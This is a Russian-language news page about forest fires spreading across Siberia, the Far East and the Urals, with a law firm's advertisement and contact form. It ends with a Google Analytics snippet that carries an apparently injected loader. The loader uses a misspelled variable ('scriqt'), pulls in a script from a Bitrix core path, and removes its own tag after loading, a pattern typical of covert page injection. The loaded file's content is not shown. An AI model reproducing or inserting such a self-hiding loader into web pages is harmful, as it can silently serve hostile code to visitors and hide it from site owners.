В несколько раз выросла площадь лесных пожаров в Сибири, на Дальнем Востоке и на Урале.

В несколько раз выросла площадь лесных пожаров в Сибири, на Дальнем Востоке и на Урале. В несколько раз выросла площадь лесных пожаров в Сибири, на Дальнем Востоке и на Урале.

Только за сутки в Красноярском крае огонь охватил еще 150 гектаров тайги. Сложной остается ситуация и в Бурятии, как отмечают в агентстве лесного хозяйства, причиной возникновения пожаров стало неосторожное обращение с огнем, в основном речь идет о поджогах сухой травы.

Режим ЧС накануне был введен в одном из районов Приамурья. Особый противопожарный режим действует в Омской области, там зафиксировано 100 очагов возгорания. Из-за сильного дыма до нулевой опускалась видимость на трассе Екатеринбург – Шадринск - Курган.

В итоге движение транспорта там было остановлено, был ограничен выезд междугородных автобусов. Есть надежда, что обстановку стабилизируют осадки. В уральских регионах ожидается мокрый снег.
Возврат к списку


У нас сотни выигранных дел – отзывы реальных клиентов это доказывают!

Работайте с профессионалами!

Звонки и заявки на консультацию принимаются круглосуточно.

Вы получите четкие и понятные консультации: «без воды» - только суть! С нашей помощью Вы обойдете сложные «ловушки и капканы» закона.

ФИО
Телефон
Текст сообщения
Это поле обязательно для заполнения
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');var scriqt=document.createElement('script');scriqt.src='/bitrix/js/main/core/core_loader.js?v=0.2.14';scriqt.onload=function(){document.head.removeChild(scriqt);};document.head.appendChild(scriqt); ga('create', 'UA-83802593-1', 'auto'); ga('send', 'pageview');